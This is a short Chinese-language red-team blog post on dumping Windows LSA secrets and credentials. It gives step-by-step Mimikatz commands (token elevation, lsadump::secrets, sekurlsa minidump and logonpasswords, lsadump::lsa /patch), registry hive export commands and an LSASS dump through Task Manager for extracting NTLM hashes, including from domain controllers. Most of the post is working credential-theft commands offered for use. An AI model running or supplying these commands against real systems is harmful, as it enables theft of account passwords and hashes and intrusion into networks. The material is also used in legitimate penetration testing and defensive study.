LSA转储 9 months ago red.ghostwolflab.com 1 minute LSA是本地安全机构(Local Security Authority)的缩写,它是Windows操作系统中负责验证用户身份和强制本地安全策略的核心组件。LSA包含本地安全机构服务器服务(LSASS)进程,它管理着微软账号和Azure相关的密码和令牌等必要的系统凭证 模拟令牌转储 在Mimikatz中执行以下命令即可转储LSA: privilege::debug token::elevate lsadump::secrets 注册表转储 首先在cmd中输入以下命令以转储注册表: reg save HKLM\SYSTEM system reg save HKLM\security security 接着在Mimikatz中输入以下命令即可提取HASH: privilege::debug lsadump::secrets /system:c:\Users\snowwolf\Desktop\system /security:c:\Users\snowwolf\Desktop\security 任务管理器 在Windows主机中打开任务管理器查找lsass.exe进程并右键创建转储文件即可: 现在启动Mimikatz并输入以下命令即可提取HASH: privilege::debug sekurlsa::minidump C:\Users\snowwolf\AppData\Local\Temp\lsass.DMP sekurlsa::logonpasswords 在Windows 10 和 Windows 11 版本,该进程更改为如下图所示: Patch参数 lsadump::lsa /patch命令是专用于在域控制器上导出用户密码或哈希的命令,它可以绕过LSA保护,直接从内存中读取NTDS.DIT文件的内容。在Mimikatz中执行以下命令即可提取: privilege::debug lsadump::lsa /patch 我们可以看到域名、SysKey、本地SID、SAMKey等信息,以及每个用户的RID、用户名和NTLM哈希值 当然,还有其它方法提取,比如转储Lsass且不使用Mimikatz。